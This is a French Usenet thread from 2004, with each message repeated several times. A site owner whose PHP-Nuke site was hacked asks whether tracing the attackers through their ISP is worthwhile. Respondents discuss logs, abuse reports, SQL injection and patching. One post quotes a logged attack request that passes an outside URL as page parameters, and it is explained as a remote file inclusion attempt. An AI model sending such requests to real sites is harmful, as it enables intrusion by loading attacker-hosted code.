Ces derniers jours, mon site a été hacké à deux reprises. Rien de bien
méchant, mais j'ai pris les dispositions nécessaires afin de sécuriser
la bête (qui ne l'était pas...)
Je me pose une question, en scrutant les logs, il doit etre possible de
retrouver les infos concernant ces sales gamins.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine
perdue ou le jeu en vaut-il la chandelle ?
Je n'ai jusqu'a présent jamais été confronté à ce genre de chose, c'est
pourquoi je me pose ces questions.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine perdue ou le jeu en vaut-il la chandelle ?
Il est en général très difficile de réveiller le FAI concerné. Après, il faut le motiver pour remonter à la source et croises ses logs. Et après ? Porter plainte ? Si le délit a été causé depuis une machine en dehors du territoire national (ou pire, en dehors de l'UE), cela devient une vraie gageure.
Mon conseil est de renforcer sa sécurité avant tout. Quitte à surveiller la plage d'IP qui a été utilisée pour lancer les attaques, au passage.
Toto wrote:
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine
perdue ou le jeu en vaut-il la chandelle ?
Il est en général très difficile de réveiller le FAI concerné. Après, il
faut le motiver pour remonter à la source et croises ses logs. Et après
? Porter plainte ? Si le délit a été causé depuis une machine en dehors
du territoire national (ou pire, en dehors de l'UE), cela devient une
vraie gageure.
Mon conseil est de renforcer sa sécurité avant tout. Quitte à surveiller
la plage d'IP qui a été utilisée pour lancer les attaques, au passage.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine perdue ou le jeu en vaut-il la chandelle ?
Il est en général très difficile de réveiller le FAI concerné. Après, il faut le motiver pour remonter à la source et croises ses logs. Et après ? Porter plainte ? Si le délit a été causé depuis une machine en dehors du territoire national (ou pire, en dehors de l'UE), cela devient une vraie gageure.
Mon conseil est de renforcer sa sécurité avant tout. Quitte à surveiller la plage d'IP qui a été utilisée pour lancer les attaques, au passage.
Cedric Blancher
Le Thu, 24 Jun 2004 15:35:22 +0000, Toto a écrit :
Ces derniers jours, mon site a été hacké à deux reprises. Rien de bien méchant, mais j'ai pris les dispositions nécessaires afin de sécuriser la bête (qui ne l'était pas...)
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que les attaquants sont passés par les failles que tu as colmatées ? La suite du message laisse supposer que non...
Je me pose une question, en scrutant les logs, il doit etre possible de retrouver les infos concernant ces sales gamins.
Ça dépend des logs que tu as sous la main. S'ils sont passé par une faille dans l'application Web, tu peux regarder la tronche des requêtes passées au serveur Web, encore qu'on ne puisse pas tout voir selon la configuration des logs.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine perdue ou le jeu en vaut-il la chandelle ? Je n'ai jusqu'a présent jamais été confronté à ce genre de chose, c'est pourquoi je me pose ces questions.
Si c'est pour une poursuite, il faudra que tu portes plainte. Te rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te fournir ses logs. Donc...
-- BOFH excuse #83:
Support staff hung over, send aspirin and come back LATER.
Le Thu, 24 Jun 2004 15:35:22 +0000, Toto a écrit :
Ces derniers jours, mon site a été hacké à deux reprises. Rien de bien
méchant, mais j'ai pris les dispositions nécessaires afin de sécuriser
la bête (qui ne l'était pas...)
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que
les attaquants sont passés par les failles que tu as colmatées ? La
suite du message laisse supposer que non...
Je me pose une question, en scrutant les logs, il doit etre possible de
retrouver les infos concernant ces sales gamins.
Ça dépend des logs que tu as sous la main. S'ils sont passé par une
faille dans l'application Web, tu peux regarder la tronche des requêtes
passées au serveur Web, encore qu'on ne puisse pas tout voir selon la
configuration des logs.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine
perdue ou le jeu en vaut-il la chandelle ? Je n'ai jusqu'a présent
jamais été confronté à ce genre de chose, c'est pourquoi je me pose
ces questions.
Si c'est pour une poursuite, il faudra que tu portes plainte. Te
rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te
fournir ses logs. Donc...
--
BOFH excuse #83:
Support staff hung over, send aspirin and come back LATER.
Le Thu, 24 Jun 2004 15:35:22 +0000, Toto a écrit :
Ces derniers jours, mon site a été hacké à deux reprises. Rien de bien méchant, mais j'ai pris les dispositions nécessaires afin de sécuriser la bête (qui ne l'était pas...)
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que les attaquants sont passés par les failles que tu as colmatées ? La suite du message laisse supposer que non...
Je me pose une question, en scrutant les logs, il doit etre possible de retrouver les infos concernant ces sales gamins.
Ça dépend des logs que tu as sous la main. S'ils sont passé par une faille dans l'application Web, tu peux regarder la tronche des requêtes passées au serveur Web, encore qu'on ne puisse pas tout voir selon la configuration des logs.
Cela vaut-il la peine de se rapprocher du FAI concerné, est-ce peine perdue ou le jeu en vaut-il la chandelle ? Je n'ai jusqu'a présent jamais été confronté à ce genre de chose, c'est pourquoi je me pose ces questions.
Si c'est pour une poursuite, il faudra que tu portes plainte. Te rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te fournir ses logs. Donc...
-- BOFH excuse #83:
Support staff hung over, send aspirin and come back LATER.
Toto
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que les attaquants sont passés par les failles que tu as colmatées ? La suite du message laisse supposer que non...
Patch de sécurité, cataplasmes en tous genres... Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont assez limitées
Si c'est pour une poursuite, il faudra que tu portes plainte. Te rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te fournir ses logs. Donc...
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI aurai pu les dissuader de recommencer...
Merci de vos eclairages ;-)
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que
les attaquants sont passés par les failles que tu as colmatées ? La
suite du message laisse supposer que non...
Patch de sécurité, cataplasmes en tous genres...
Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection
sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont
assez limitées
Si c'est pour une poursuite, il faudra que tu portes plainte. Te
rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te
fournir ses logs. Donc...
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI
aurai pu les dissuader de recommencer...
Qu'est-ce que tu as fait pour le sécuriser ? Est-ce que tu es sûr que les attaquants sont passés par les failles que tu as colmatées ? La suite du message laisse supposer que non...
Patch de sécurité, cataplasmes en tous genres... Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont assez limitées
Si c'est pour une poursuite, il faudra que tu portes plainte. Te rapprocher du FAI ne t'apportera rien parce qu'il n'est pas censé te fournir ses logs. Donc...
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI aurai pu les dissuader de recommencer...
Merci de vos eclairages ;-)
Cedric Blancher
Le Thu, 24 Jun 2004 19:15:24 +0000, Toto a écrit :
Patch de sécurité, cataplasmes en tous genres...
OK
Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont assez limitées
Typiquement, une injection SQL est le genre d'action qui ne peut pas être empêchée par application de patches de sécurité sur l'OS ou le serveur Web. Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader le truc, mais si c'est un site maison, il faut repasser sur le code.
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI aurai pu les dissuader de recommencer...
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs source, tu peux remonter un abuse à leur FAI.
-- ensuite j'ai un aytre probléme (c'est peut etre le meme) dans l'eau je ne vois rien :( Si qqu'un connait le pb ... -+- jean in GPJ : bien configurer ses lunettes dans TFC -+-
Le Thu, 24 Jun 2004 19:15:24 +0000, Toto a écrit :
Patch de sécurité, cataplasmes en tous genres...
OK
Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection
sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont
assez limitées
Typiquement, une injection SQL est le genre d'action qui ne peut pas être
empêchée par application de patches de sécurité sur l'OS ou le serveur
Web. Il faut modifier le code des pages Web. Si tu as un site web basé
sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
le truc, mais si c'est un site maison, il faut repasser sur le code.
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI
aurai pu les dissuader de recommencer...
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs
source, tu peux remonter un abuse à leur FAI.
--
ensuite j'ai un aytre probléme (c'est peut etre le meme) dans l'eau
je ne vois rien :( Si qqu'un connait le pb ...
-+- jean in GPJ : bien configurer ses lunettes dans TFC -+-
Le Thu, 24 Jun 2004 19:15:24 +0000, Toto a écrit :
Patch de sécurité, cataplasmes en tous genres...
OK
Je ne suis sur de rien avec ces zoziaux là. Il ont fait une injection sql d'apres ce que j'ai pu voir mais mes compétences en ce domaine sont assez limitées
Typiquement, une injection SQL est le genre d'action qui ne peut pas être empêchée par application de patches de sécurité sur l'OS ou le serveur Web. Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader le truc, mais si c'est un site maison, il faut repasser sur le code.
Pas vraiment pour une poursuite, mais j'avais osé espéré que le FAI aurai pu les dissuader de recommencer...
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs source, tu peux remonter un abuse à leur FAI.
-- ensuite j'ai un aytre probléme (c'est peut etre le meme) dans l'eau je ne vois rien :( Si qqu'un connait le pb ... -+- jean in GPJ : bien configurer ses lunettes dans TFC -+-
Fabien LE LEZ
On 24 Jun 2004 19:18:44 GMT, Cedric Blancher :
tu peux remonter un abuse à leur FAI.
...avec une chance sur cinq qu'un humain lise l'email un jour... Mais au moins, tu auras la satisfaction de recevoir un message de remerciement de la part d'un gentil robot ;-)
-- schtroumpf schtroumpf
On 24 Jun 2004 19:18:44 GMT, Cedric Blancher
<blancher@cartel-securite.fr>:
tu peux remonter un abuse à leur FAI.
...avec une chance sur cinq qu'un humain lise l'email un jour...
Mais au moins, tu auras la satisfaction de recevoir un message de
remerciement de la part d'un gentil robot ;-)
...avec une chance sur cinq qu'un humain lise l'email un jour... Mais au moins, tu auras la satisfaction de recevoir un message de remerciement de la part d'un gentil robot ;-)
-- schtroumpf schtroumpf
Cedric Blancher
Le Thu, 24 Jun 2004 19:43:08 +0000, Fabien LE LEZ a écrit :
tu peux remonter un abuse à leur FAI. ...avec une chance sur cinq qu'un humain lise l'email un jour...
Mais au moins, tu auras la satisfaction de recevoir un message de remerciement de la part d'un gentil robot ;-)
Certes :) Mais pour ce que ça te coûte en temps... Et puis si personne ne remonte plus d'abuse, c'est clair que les FAIs ne vont taper sur personne. En outre, certains FAIs français ont bien amélioré leur service abuse, alors que d'autres sont restés toujours aussi nuls (mériteraient une bonne UDP), avec des messages lus, avertissements et parfois sanctions.
À défaut d'avoir les sous pour les attaquer en justice, ça fait toujours plaisir de voir une boîte de spammers ayant pignon sur rue se faire fermer son compte.
-- je bavarde de ce que je veux -+- CF in Guide du Fmblien Assassin : bien configurer son bavardage -+-
Le Thu, 24 Jun 2004 19:43:08 +0000, Fabien LE LEZ a écrit :
tu peux remonter un abuse à leur FAI.
...avec une chance sur cinq qu'un humain lise l'email un jour...
Mais au moins, tu auras la satisfaction de recevoir un message de
remerciement de la part d'un gentil robot ;-)
Certes :)
Mais pour ce que ça te coûte en temps... Et puis si personne ne remonte
plus d'abuse, c'est clair que les FAIs ne vont taper sur personne. En
outre, certains FAIs français ont bien amélioré leur service abuse,
alors que d'autres sont restés toujours aussi nuls (mériteraient une
bonne UDP), avec des messages lus, avertissements et parfois sanctions.
À défaut d'avoir les sous pour les attaquer en justice, ça fait
toujours plaisir de voir une boîte de spammers ayant pignon sur rue se
faire fermer son compte.
--
je bavarde de ce que je veux
-+- CF in Guide du Fmblien Assassin : bien configurer son bavardage -+-
Le Thu, 24 Jun 2004 19:43:08 +0000, Fabien LE LEZ a écrit :
tu peux remonter un abuse à leur FAI. ...avec une chance sur cinq qu'un humain lise l'email un jour...
Mais au moins, tu auras la satisfaction de recevoir un message de remerciement de la part d'un gentil robot ;-)
Certes :) Mais pour ce que ça te coûte en temps... Et puis si personne ne remonte plus d'abuse, c'est clair que les FAIs ne vont taper sur personne. En outre, certains FAIs français ont bien amélioré leur service abuse, alors que d'autres sont restés toujours aussi nuls (mériteraient une bonne UDP), avec des messages lus, avertissements et parfois sanctions.
À défaut d'avoir les sous pour les attaquer en justice, ça fait toujours plaisir de voir une boîte de spammers ayant pignon sur rue se faire fermer son compte.
-- je bavarde de ce que je veux -+- CF in Guide du Fmblien Assassin : bien configurer son bavardage -+-
Toto
Typiquement, une injection SQL est le genre d'action qui ne peut pas être empêchée par application de patches de sécurité sur l'OS ou le serveur Web. Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
le truc, mais si c'est un site maison, il faut repasser sur le code.
Nan, j'ai dit que mes compétences étaient limitées ;-)
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs source, tu peux remonter un abuse à leur FAI.
On va toujours faire ça
Merci des infos
Typiquement, une injection SQL est le genre d'action qui ne peut pas être
empêchée par application de patches de sécurité sur l'OS ou le serveur
Web. Il faut modifier le code des pages Web. Si tu as un site web basé
sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
le truc, mais si c'est un site maison, il faut repasser sur le code.
Nan, j'ai dit que mes compétences étaient limitées ;-)
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs
source, tu peux remonter un abuse à leur FAI.
Typiquement, une injection SQL est le genre d'action qui ne peut pas être empêchée par application de patches de sécurité sur l'OS ou le serveur Web. Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
le truc, mais si c'est un site maison, il faut repasser sur le code.
Nan, j'ai dit que mes compétences étaient limitées ;-)
Mouais. Z'ont d'autres chats à fouetter. Au pire, si tu as les IPs source, tu peux remonter un abuse à leur FAI.
On va toujours faire ça
Merci des infos
Cedric Blancher
Le Thu, 24 Jun 2004 21:13:01 +0000, Toto a écrit :
Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut se faire facilement avec Google :
-- SP: Un OS connu, simple à utiliser, mais avec une fondation Unix CF: La théière ? SP: On a dit "connu". -+- SP in Guide du Macounet Pervers : BeOS, à l'heure du thé -+-
Le Thu, 24 Jun 2004 21:13:01 +0000, Toto a écrit :
Il faut modifier le code des pages Web. Si tu as un site web basé
sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles
à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut
se faire facilement avec Google :
--
SP: Un OS connu, simple à utiliser, mais avec une fondation Unix
CF: La théière ?
SP: On a dit "connu".
-+- SP in Guide du Macounet Pervers : BeOS, à l'heure du thé -+-
Le Thu, 24 Jun 2004 21:13:01 +0000, Toto a écrit :
Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut se faire facilement avec Google :
-- SP: Un OS connu, simple à utiliser, mais avec une fondation Unix CF: La théière ? SP: On a dit "connu". -+- SP in Guide du Macounet Pervers : BeOS, à l'heure du thé -+-
Toto
Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut se faire facilement avec Google :
Tiens, ben justement, l'un des cataplasmes dont je parlais plus haut m'a envoyé des nouvelles du front :
Date & Time: 2004-06-25 04:47:35 Blocked IP: 217.0.0.0 User ID: Anonymous (1) Reason: Abuse - OTHER -------------------- User Agent: Wget/1.6 Query String: www.gnubox.net/modules.php?name=http%3A//217.59.104.226/&pagenum=http%3A//217.59.104.226/ Forwarded For: none Client IP: none Remote Address: 217.160.129.159 Remote Port: 44052 Request Method: GET -------------------- Who-Is for IP 217.160.129.159
C'est ça une injection sql ? Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION !!' oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a fait normale ? Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi je l'ai bloqué...dur dur quand meme
Quant à l'identité du méchant :
OrgName: RIPE Network Coordination Centre OrgID: RIPE Address: Singel 258 Address: 1016 AB City: Amsterdam StateProv: PostalCode: Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 217.0.0.0 - 217.255.255.255 CIDR: 217.0.0.0/8 NetName: 217-RIPE NetHandle: NET-217-0-0-0-1 Parent: NetType: Allocated to RIPE NCC NameServer: NS-PRI.RIPE.NET NameServer: NS3.NIC.FR NameServer: SUNIC.SUNET.SE NameServer: AUTH00.NS.UU.NET NameServer: SEC1.APNIC.NET NameServer: SEC3.APNIC.NET NameServer: TINNIE.ARIN.NET Comment: These addresses have been further assigned to users in Comment: the RIPE NCC region. Contact information can be found in Comment: the RIPE database at http://www.ripe.net/whois RegDate: 2000-06-05 Updated: 2004-03-16
Vala
Il faut modifier le code des pages Web. Si tu as un site web basé
sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles
à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut
se faire facilement avec Google :
Tiens, ben justement, l'un des cataplasmes dont je parlais plus haut m'a
envoyé des nouvelles du front :
Date & Time: 2004-06-25 04:47:35
Blocked IP: 217.0.0.0
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: Wget/1.6
Query String:
www.gnubox.net/modules.php?name=http%3A//217.59.104.226/&pagenum=http%3A//217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 44052
Request Method: GET
--------------------
Who-Is for IP
217.160.129.159
C'est ça une injection sql ?
Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION !!'
oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a
fait normale ?
Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn
plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi je
l'ai bloqué...dur dur quand meme
Quant à l'identité du méchant :
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 217.0.0.0 - 217.255.255.255
CIDR: 217.0.0.0/8
NetName: 217-RIPE
NetHandle: NET-217-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH00.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2000-06-05
Updated: 2004-03-16
Il faut modifier le code des pages Web. Si tu as un site web basé sur un produit générique (PHP-Nuke, PHP-Portal, etc.), il faut upgrader
C'est ce que j'ai fait, en effet, c'est un phpnuke
Faut faire gaffe aux produits tout fait. Les failles sont _très_ faciles à trouver, puisqu'il suffit de trouver la version du produit, ce qui peut se faire facilement avec Google :
Tiens, ben justement, l'un des cataplasmes dont je parlais plus haut m'a envoyé des nouvelles du front :
Date & Time: 2004-06-25 04:47:35 Blocked IP: 217.0.0.0 User ID: Anonymous (1) Reason: Abuse - OTHER -------------------- User Agent: Wget/1.6 Query String: www.gnubox.net/modules.php?name=http%3A//217.59.104.226/&pagenum=http%3A//217.59.104.226/ Forwarded For: none Client IP: none Remote Address: 217.160.129.159 Remote Port: 44052 Request Method: GET -------------------- Who-Is for IP 217.160.129.159
C'est ça une injection sql ? Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION !!' oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a fait normale ? Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi je l'ai bloqué...dur dur quand meme
Quant à l'identité du méchant :
OrgName: RIPE Network Coordination Centre OrgID: RIPE Address: Singel 258 Address: 1016 AB City: Amsterdam StateProv: PostalCode: Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 217.0.0.0 - 217.255.255.255 CIDR: 217.0.0.0/8 NetName: 217-RIPE NetHandle: NET-217-0-0-0-1 Parent: NetType: Allocated to RIPE NCC NameServer: NS-PRI.RIPE.NET NameServer: NS3.NIC.FR NameServer: SUNIC.SUNET.SE NameServer: AUTH00.NS.UU.NET NameServer: SEC1.APNIC.NET NameServer: SEC3.APNIC.NET NameServer: TINNIE.ARIN.NET Comment: These addresses have been further assigned to users in Comment: the RIPE NCC region. Contact information can be found in Comment: the RIPE database at http://www.ripe.net/whois RegDate: 2000-06-05 Updated: 2004-03-16
Vala
Cedric Blancher
Le Fri, 25 Jun 2004 09:24:21 +0000, Toto a écrit :
Tiens, ben justement, l'un des cataplasmes dont je parlais plus haut m'a envoyé des nouvelles du front : [...]
Non. C'est une tentative de d'injection de code. En fait, le mec suppose que l'un de tes arguments va être passé tel quel à un fopen() et que tu auras l'URL_fopen wrapper actif pour, au lieu d'ouvrir un fichier local, ouvrir la site qu'il te passe en paramètre.
Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION!!' oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a fait normale ?
Entre nous, ça m'étonnerait qu'elle soit normale. Tu devrais faire le tour de ton application pour regarder un peu ce qu'elle prend comme paramètres, son mode de fonctionnement, etc. Je sais que c'est chiant, mais c'est comme ça qu'on arrive à distinguer ce qui est normal de ce qui ne l'est pas.
Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi je l'ai bloqué...dur dur quand meme
Ben ouais. C'est pas l'IP qu'il faut bloquer, juste la requête malicieuse. Tu imagine si tu bloque un proxy par exemple ?
Quant à ton whois, je ne sais pas sur quel serveur tu le fais, mais il est faux...
-- BOFH excuse #22:
monitor resolution too high
Le Fri, 25 Jun 2004 09:24:21 +0000, Toto a écrit :
Tiens, ben justement, l'un des cataplasmes dont je parlais plus haut m'a
envoyé des nouvelles du front :
[...]
Non. C'est une tentative de d'injection de code. En fait, le mec suppose
que l'un de tes arguments va être passé tel quel à un fopen() et que tu
auras l'URL_fopen wrapper actif pour, au lieu d'ouvrir un fichier local,
ouvrir la site qu'il te passe en paramètre.
Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION!!'
oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a
fait normale ?
Entre nous, ça m'étonnerait qu'elle soit normale. Tu devrais faire le
tour de ton application pour regarder un peu ce qu'elle prend comme
paramètres, son mode de fonctionnement, etc. Je sais que c'est chiant,
mais c'est comme ça qu'on arrive à distinguer ce qui est normal de ce
qui ne l'est pas.
Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn
plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi
je l'ai bloqué...dur dur quand meme
Ben ouais. C'est pas l'IP qu'il faut bloquer, juste la requête
malicieuse. Tu imagine si tu bloque un proxy par exemple ?
Quant à ton whois, je ne sais pas sur quel serveur tu le fais, mais il
est faux...
Non. C'est une tentative de d'injection de code. En fait, le mec suppose que l'un de tes arguments va être passé tel quel à un fopen() et que tu auras l'URL_fopen wrapper actif pour, au lieu d'ouvrir un fichier local, ouvrir la site qu'il te passe en paramètre.
Parce que mon nouveau probleme, c'est que ce truc me dit 'ATTENTION!!' oui moi j'veux bien, mais qui me dit que cette requete n'est pas tout a fait normale ?
Entre nous, ça m'étonnerait qu'elle soit normale. Tu devrais faire le tour de ton application pour regarder un peu ce qu'elle prend comme paramètres, son mode de fonctionnement, etc. Je sais que c'est chiant, mais c'est comme ça qu'on arrive à distinguer ce qui est normal de ce qui ne l'est pas.
Hier je bloque une IP paske je reçois ce genre d'avertissement, 10Mn plus tard, je reçois un mail d'un wanadoozien que me demande pourquoi je l'ai bloqué...dur dur quand meme
Ben ouais. C'est pas l'IP qu'il faut bloquer, juste la requête malicieuse. Tu imagine si tu bloque un proxy par exemple ?
Quant à ton whois, je ne sais pas sur quel serveur tu le fais, mais il est faux...
